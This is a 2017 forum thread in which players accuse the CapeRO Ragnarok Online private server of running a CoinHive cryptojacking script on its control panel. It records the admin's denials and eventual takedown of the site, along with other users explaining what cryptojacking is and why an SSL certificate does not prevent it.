CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency

Started by Fluorite~, Dec 30, 2017, 09:53 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Fluorite~

Upon accessing CapeRO's website, I was alerted by my antivirus that it had stopped a CoinHive script from running.  After checking the page source, there is definitely a CoinHive script integrated on its Main Page/Patcher.
https://i.imgur.com/U4Jad9W.png

For those of you who are unaware, CoinHive is a Javascript that activates when a user accesses a webpage.  When it runs, it does so without the user's permission and consumes their processor's resources in a cryptocurrency mining operation.
https://blog.malwarebytes.com/security-world/2017/10/why-is-malwarebytes-blocking-coinhive/
https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/

When the admin was asked about it, CapeRO said it was "a common problem with Ragnarok Thor Patchers + Windows Update" (it isn't) and seemed to suggest it was the fault of viruses present in a player, closing the topic shortly afterwards.
https://cape-ro.com/forum/index.php?/topic/283-troyan-inside-cape-ro-patcher/?p=1561
Image copies of the discussion:
https://i.imgur.com/dALXcpo.png
https://i.imgur.com/mPbnojY.png

I can understand the need for income when running an RO server, but unauthorized usage of your unsuspecting userbase's computers is not a path to walk down.

CapeRO

We checked the patcher files and couldn't even find this. Based on the domain on your screenshot; It's not even the patcher's domain.. That's the Control Panel's Domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from, If you have a good source of accurate information then let us know because we didn't build this website ourself, it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find someting we'll definitely fix it right away.

ps: If you're a legit forum member, you'll know that everytime I answer reports / suggestions i would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something todo with the Control Panel. We will Investigate further.
Update#3 Website has been put under-maintenance for re-construction and fixing of whatever error there is.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

I don't know about the patcher, but it's definitely on the main control panel, starting at line 63 in the page source. view-source:https://cape-ro.com/cp/ I was keeping an eye on this server, sad to see.

CapeRO

We checked the patcher files and couldn't even find this. Based on the domain on your screenshot; It's not even the patcher's domain.. That's the Control Panel's Domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from, If you have a good source of accurate information then let us know because we didn't build this website ourself, it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find someting we'll definitely fix it right away.

ps: If you're a legit forum member, you'll know that everytime I answer reports / suggestions i would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something todo with the Control Panel. We will Investigate further.
Update#3 Website has been put under-maintenance for re-construction and fixing of whatever error there is.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Fluorite~

Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.


CapeRO

Quote from: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

I see, so you basically just randomly figured out that there is a problem with the patcher without even trying it. Is it really strange to tell them that if I found nothing wrong with the Server's Patcher? Thor patchers does have problems with anti-viruses because it's detecting it as false alarm.  If the report was on-point and see the bug then we would have fixed it right away. The problem wasn't coming from the Thor Patcher but the website coding itself. It did not affect anybody and no harm was done. We're just putting the site / cp on maintenance to make sure everything will be alright and safe.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Fluorite~

Why would anyone even attempt to download a Patcher that is suspected to be infected...?

As for it being an issue with Windows Defender + Thor Patchers, that is horribly misinformed.  When there are issues with Thor Patchers being detected as trojans, it's a detected issue with the Patcher's files itself, not a BitCoin miner like CoinHive as stated in the forum report.  Elvarion and Puddles in that forum report even gave huge leads as to what the real problem was in that report before it was closed.  It was negligent to throw that under the umbrella statement of being a false positive detection and moving on.

Regardless, the website has/had an active CoinHive Javascript for any visitors.  Whether it's yours or not is not something I can confirm, but it was positively running on your website and tapping into their computer's resources as a result.  It's good of you to respond to the problem immediately.

CapeRO

Quote from: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

Quote from: CapeRO on Dec 30, 2017, 11:32 PM
Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.

I'm not sure if you're being willfully ignorant or not of the extra strain it puts on peoples PC's to mine bitcoin, along with power consumption. A lot of RO players run on old clunky pc's or toasters. That extra strain could easily mess up their pc's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive

CapeRO

Quote from: Kurisuga on Dec 30, 2017, 11:38 PM
I'm not sure if you're being willfully ignorant or not of the extra strain it puts on peoples PC's to mine bitcoin, along with power consumption. A lot of RO players run on old clunky pc's or toasters. That extra strain could easily mess up their pc's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive

I also run on old chunky pc myself or "toasters". I have no idea what this coin-hive but it sounds like some online currency so if people loses whatever currency that is then that's how we basically find out. We're not even sure if this is functioning or what so we can't judge if anybody is infected or not by just brain storming it.

But we are doing what we need to do, We're fixing whatever issue there is.

PS: I don't get the accusations really. Why would we Install SSL Certificates if this was intentional.
"SSL Certificates are small data files that digitally bind a cryptographic key to an organization's details. When installed on a web server, it activates the padlock and the https protocol (over port 443) and allows secure connections from a web server to a browser."

Update 1: I just read the info about it so it's not about losing peoples currency. Still not-sure how it functions but it's being dealt with.
Update 2: I run on Chunky PC and never experience slowing down. ( I visit this site like 1,000 a day )

Thanks for reporting this and actions are being worked on.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

The script makes the pc "create" the online currency by solving very long and taxing algorithms at the expense of their GPU/CPU use. The currency created goes into the pockets of whoever infected the control panel at the expense of the website visitors power bill and pc processing power, which could overtax the parts over time. Sorry about the accusations, but it just really is damaging, especially because majority of people wont ever know they were being taken advantage of in the first place.

CapeRO

Yeah I just read the information about it.

Thank you everybody for your concern. Website has been put under-maintenance fo full check & fixing. I'll give an update when it's back.
If anybody has further issues please contact me at [email protected] . Regards.

ps: WEBSITE IS SAFE to Browse as we have taken down the CP. ( check all your want )
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Parachute

I have not downloaded the server's patcher nor visited your site. Not to mention, I don't know where you installed your thor patcher, but in my case, I got this report accessing your site just now:

https://forumcgamershub-com-s3.s3.amazonaws.com/original/2X/6/6dd744dd6d53b4197d731a801786773ee45a0d68.png

Meaning regardless if you put your website under maintenance, the damage has already been done. Your domain name had been listed as infected site.

I'm not here to put more drama on this thread, but to give an advice as a Cybersecurity student. Please contact (uhm a lot of) Anti-malware protection/sites as they considered and listed your site as a dangerous webpage. If your users could not see this notice, then they probably doesn't have a decent protection in their devices/browsers. If they do, they may not access your site without warning and you might lose some interested players. So 2 probable solutions:

1. contact A LOT of anti-malware companies
2. change your domain name

Having HTTPS (SSL) does not protect your website from these attacks. SSL establishes encrypted link between your user's browser and your website to make sure all data passed down remain private. main reason why it's generally installed in Shop's checkout and cart webpages. But in no way an SSL protects your site with these type of attacks (if you had been the victim of such). You can even pay for a much more expensive certificate and still be vulnerable to these kind of threats. In this case, there's a totally different protection for that.

Due to the recent growth of Cryptocurrency, here comes the new trend for the past 3 months called "Cryptojacking." And yes, one of its pioneers is a company called CoinHive. What it does is self-explanatory - It secretly uses the user's laptop, pc or even mobile devices to mine cryptocurrency whenever you visit an infected site. But ofc, Anti-Malware companies are not slow on their side, they instantly detected this. But the only thing I do not understand, Usually hackers tend to attack and infect big websites with a bunch of daily user visitors, not an RO website. So I just hope you did not add this javascript - which as it seems you have no idea how it gotten there. Either way, there has to be a culprit.

CapeRO

Thanks for the advice, I will make contacts with anti-malware companies. I have deleted all other files except Forums and cleaned it up. Only issue would be the one you posted above about the warning. I'm not sure also why would they have an interest with an RO website but hopefully our fix will solve all the issues. Regards.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.